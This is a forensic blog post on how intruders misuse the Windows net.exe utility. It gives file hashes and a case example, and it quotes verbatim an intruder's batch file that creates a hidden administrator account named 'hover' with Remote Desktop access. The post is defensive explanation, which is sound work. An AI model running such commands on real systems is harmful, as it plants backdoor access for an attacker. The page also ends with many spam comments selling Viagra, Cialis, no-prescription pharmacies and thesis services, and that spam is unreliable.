Forensic Data Solutions® 

Service you can count on


Net Commands

Posted by M. Gene Shantz on December 30, 2015 at 4:05 PM

I have come across the executable “net.exe” several times during engagments and heard it referred to as a tool commonly used by nefarious intruders to do bad things in a network. So I decided that it would make a good forensic topic.

For those of us who do not come from an IT background, learning and understand that intruders can and will often use IT administrative tools that are already in the environment they are compromising is important for us to be able to trace their activities within the network. While the Trojan’s and virus’s give the intruder the initial access to the system they will commonly use legitimate command line tools to navigate and traverse the network as well as hiding their activity for as long as possible.

The Net Command is described by Microsoft as: “The Net.exe Utility component is a command-line tool that controls users, groups, services, and network connections.”


This command is a very powerful tool that intruders like to use for various tasks such as mapping a network or creating and/or modify user accounts once they get administrative access.

The Net command list is quite long and not the focus of this nugget, however, if you looking to mess around with a few of the commands just to see its power and usefulness, here is a couple websites that list the commands and provide examples.

First let’s talk about where you should see this file on a clean system. In my clean Windows 7 x64 box and these were the 4 locations for this file. Note this is a 64bit OS so there is a 32bit executable in the SysWOW64 directory with the 64 bit in the System32 directory.


The file MD5 hash values are:

64 bit > 63DD6FBAABF881385899FD39DF13DCE3

32 bit> B9A4DAC2192FD78CDA097BFA79F6E7B2

From an engagement perspective, I wanted to share an example of how I have come across this tool in use.

During an engagement where a server was significantly compromised, after finding the creation of a user account in the log analysis, we located a folder that was in the Windows directory off the root that contained a few tools and batch files that were placed there by the intruder.

Note the presence of the services.exe and the net.exe and what is interesting when comparing the hash values of the net.exe files the suspicious one did not match either of the known good files. A Virus Total of the suspicious file showed it was the net1.exe from the Win7 SP1 but had been renamed and moved to this directory by the intruder.



So what is the difference between the net.exe and the net1.exe? According to Tim Fisher at the net.exe command had to undergo a modification due to Y2K and the net1 file is the old version that is still used for backward compatibility, but essentially the files serve the same purpose and function.

As a side note, the service.exe file in this directory was flagged in Virus Total as a Trojan and came back as the file below that had been renamed.



So let’s see how the intruder used the net command in this case. The boot.bat file was simply a batch file that contained the following net commands.

@echo off

@net user hover 58911xc, /add

@net localgroup administrators hover /add

@net user hover /active:yes

@net user hover 58911xc,

@net localgroup "Remote Desktop Users" hover /add


This was a simple command that first turns off the echo for a little more stealth and then creates the user account “hover”. Then the next line adds the account to the administrators group before activating it in the next line. Then it adds the account to the remote Desktop User groups to allow it to be logged into remotely.

In one simple swoop this intruder used the net command to give him backdoor remote access that allowed for him/her to return that their convenience.

From a network mapping perspective if an intruder can gain access to a command prompt in the environment they can run a simple command that will list out all the systems on the network, giving the intruder a pretty good idea where to look next.


Categories: Windows Artifacts

Post a Comment


Oops, you forgot something.


The words you entered did not match the given text. Please try again.

Already a member? Sign In


Reply cialis cheapest online prices
7:03 AM on August 25, 2020 
Buy Cialis Online Credit Card TisyNaws - buy cialis online us Annomitmit Permixon O Propecia equind Cialis HycleWes Immunity To Amoxicillin
Reply Emigbeemo
11:23 PM on December 20, 2020 
Kamagra 100mg Oral Gel TisyNaws cheap cialis from india Annomitmit Pastilla Cialis Disfuncion Erectil
Reply Jdbxgrogy
9:44 AM on January 26, 2021 
generic viagra discount viagrasales best place to buy real viagra online - viagra generic sale ’
Reply AqcfUsavaBova
6:02 PM on February 5, 2021 
?»?cialis cialissuperactive com order cialis online no prescription reviews
Reply Jbbvgrogy
2:16 AM on February 7, 2021 
aarp approved canadian online pharmacies best 10 online canadian pharmacies canadian pharmacy drugs online
Reply Kuikinaxy
12:27 PM on February 7, 2021 
viagra online, no prescription overnight shipping on viagra pfizer viagra 100mg online
Reply Ahkdgrogy
4:44 AM on February 8, 2021 
viagra online canadian pharmacy online drugs highest rated canadian pharmacies
Reply Fvfcenumn
5:19 AM on February 8, 2021 
viagra with dapoxetine canada cheaper viagra buy viagra gold
Reply JbnbPRINS
4:41 PM on February 8, 2021 
canadian pharmacies without an rx canada meds online prescription drugs
Reply Labxgrogy
5:45 PM on February 15, 2021 
what do bathtubs mean in cialis commercial diferencia entre sildenafil y cialis when does cialis go generic
Reply Nbmoenumn
5:35 AM on March 4, 2021 
dgeneric cialis cialis paypal payment 36 hour cialis mg
Reply Fbshgrogy
5:33 AM on March 23, 2021 - help me write a thesis thesis help free thesis proposal format thesis proposal help
Reply Fbshgrogy
10:21 PM on April 7, 2021 - online thesis writing how to write thesis proposal
Reply GvdbPRINS
5:58 PM on April 27, 2021 
alldaychemist tadalafil cialis from india mt tadalafil
Reply Bbdflups
2:57 AM on April 29, 2021 
viagra connect usa viagra free trial
Reply Rfvbenumn
10:20 PM on April 30, 2021 
cialis price comparison no prescription canadian drug stores cialis
Reply Lebngrogy
9:32 AM on May 13, 2021 
online med pharmacy escrow pharmacy online Abilify
Reply GtnbPRINS
11:12 PM on May 14, 2021 
main ingredient in viagra - use viagra watermelon natures viagra
Reply Lbsoenumn
4:19 AM on May 15, 2021 
professional cialis cialis low dose
Reply Bbshlups
4:23 AM on May 16, 2021 
viagra stories does viagra work